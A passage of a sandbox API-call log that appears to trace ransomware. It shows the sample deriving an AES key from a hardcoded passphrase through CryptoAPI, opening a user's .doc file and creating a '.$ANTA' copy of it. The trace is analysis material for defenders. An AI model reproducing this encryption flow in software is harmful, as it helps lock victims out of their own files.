hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0078.614] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.614] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0078.615] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4fa8) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.617] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.617] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.618] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.618] CryptCreateHash (in: hProv=0x41a4fa8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.618] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.619] CryptHashData (hHash=0x41ac740, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.619] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb030, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.619] CryptDeriveKey (in: hProv=0x41a4fa8, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac780) returned 1 [0078.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.619] CryptDestroyHash (hHash=0x41ac740) returned 1 [0078.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\1ft lppb9licrxn6.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.620] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.620] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0078.620] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4d00 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0078.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\1ft lppb9licrxn6.doc.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0078.623] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0078.623] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0078.629] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0078.629] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x23b6, lpOverlapped=0x0) returned 1 [0078.630] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0078.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23b6) returned 0x48f0048 [0078.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.633] 